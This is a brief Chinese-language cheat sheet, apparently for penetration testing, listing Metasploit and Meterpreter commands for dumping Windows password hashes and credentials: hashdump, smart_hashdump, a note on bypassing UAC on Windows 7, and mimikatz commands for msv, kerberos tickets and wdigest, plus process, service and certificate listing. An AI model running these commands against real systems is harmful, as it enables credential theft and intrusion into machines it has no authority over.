使用hashdump抓取密码(需要系统管理权限)
另外一个更强大的模块 smart_hashdump
如果目标是win7 就需要先绕过UAC
还可以使用msf内置的mimikatz抓取hash
msv
kerberos 抓取系统票据
wdigest 获取系统账户信息
mimikatz_command -f samdump::hashed 抓取hash
mimikatz_command -f handle::list 查看进程
mimikatz_command -f service::list windows 服务
mimikatz_command -f crypto::listProviders 查看系统证书 支持PowerShell调用(Invoke-Mimikatz)